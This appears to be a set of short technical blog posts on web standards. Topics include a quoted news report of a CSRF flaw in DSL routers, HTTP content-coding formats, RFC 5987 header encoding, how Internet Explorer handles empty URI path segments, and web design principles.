According to the links within this article, although the root URI of the router requires authentication, the /password.cgi URI doesn’t and the resulting returned HTML contains (but does not display) the plaintext of the password, as well as an HTML FORM to modify the password that is exploitable by CSRF.
The attack… infected more than 4.5 million DSL modems… The CSRF (cross-site request forgery) vulnerability allowed attackers to use a simple script to steal passwords required to remotely log in to and control the devices. The attackers then configured the modems to use malicious domain name system servers that caused users trying to visit popular websites to instead connect to booby-trapped imposter sites.
|HTTP Content Coding Token||gzip||deflate||compress|
|An encoding format produced by the file compression program "gzip" (GNU zip)||The "zlib" format as described in RFC 1950.||The encoding format produced by the common UNIX file compression program "compress".|
|Data Format||GZIP file format||ZLIB Compressed Data Format||The compress program's file format|
|Compression Method||Deflate compression method||LZW|
|Deflate consists of LZ77 and Huffman coding|
Compress doesn't seem to be supported by popular current browsers, possibly due to its past with patents.
Deflate isn't done correctly all the time. Some servers would send the deflate data format instead of the zlib data format and at least some versions of Internet Explorer expect deflate data format instead of zlib data format.
From the document: ‘Appendix B. Implementation Report: The encoding defined in this document currently is used for two different HTTP header fields: “Content-Disposition”, defined in [RFC6266], and “Link”, defined in [RFC5988]. As the encoding is a profile/clarification of the one defined in [RFC2231] in 1997, many user agents already supported it for use in “Content-Disposition” when [RFC5987] got published.
Since the publication of [RFC5987], two more popular desktop user agents have added support for this encoding; see http://purl.org/
NET/http/content-disposition-tests#encoding-2231-char for details. At this time, only one major desktop user agent (Safari) does not support it.
Note that the implementation in Internet Explorer 9 does not support the ISO-8859-1 encoding; this document revision acknowledges that UTF-8 is sufficient for expressing all code points, and removes the requirement to support ISO-8859-1.’
Yay for UTF-8!
Shortly after joining the Internet Explorer team I got a bug from a PM on a popular Microsoft web server product that I'll leave unnamed (from now on UWS). The bug said that IE was handling empty path segments incorrectly by not removing them before resolving dotted path segments. For example UWS would do the following:
In step 1 they are given a URI with dotted path segment and an empty path segment. In step 2 they remove the empty path segment, and in step 3 they resolve the dotted path segment. Whereas, given the same initial URI, IE would do the following:
IE simply resolves the dotted path segment against the empty path segment and removes them both. So, how did I resolve this bug? As "By Design" of course!
The URI RFC allows path segments of zero length and does not assign them any special meaning. So generic user agents that intend to work on the web must not treat an empty path segment any different from a path segment with some text in it. In the case above IE is doing the correct thing.
That's the case for generic user agents, however servers may decide that a URI with an empty path segment returns the same resource as a the same URI without that empty path segment. Essentially they can decide to ignore empty path segments. Both IIS and Apache work this way and thus return the same resource for the following URIs:
The issue for UWS is that it removes empty path segments before resolving dotted path segments. It must follow normal URI procedure before applying its own additional rules for empty path segments. Not doing that means they end up violating URI equivalency rules: URIs (A.1) and (B.2) are equivalent but UWS will not return the same resource for them.
Raymond Chen has some thought experiments useful for discovering various kinds of stupidity in software design:
Tim Berners-Lee's principles of Web design includes my favorite: Test of Independent Invention. This has a thought experiment containing the construction of the MMM (Multi-Media Mesh) with MRIs (Media Resource Identifiers) and MMTP (Muli-Media Transport Protocol).
The Internet design principles (RFC 1958) includes the Robustness Principle: be strict when sending and tolerant when receiving. A good one, but applied too liberally can lead to interop issues. For instance, consider web browsers. Imagine one browser becomes so popular that web devs create web pages and just test out their pages in this popular browser. They don't ensure their pages conform to standards and accidentally end up depending on the manner in which this popular browser tolerantly accepts non-standard input. This non-standard behavior ends up as de facto standard and future updates to the standard essentially has had decisions made for it.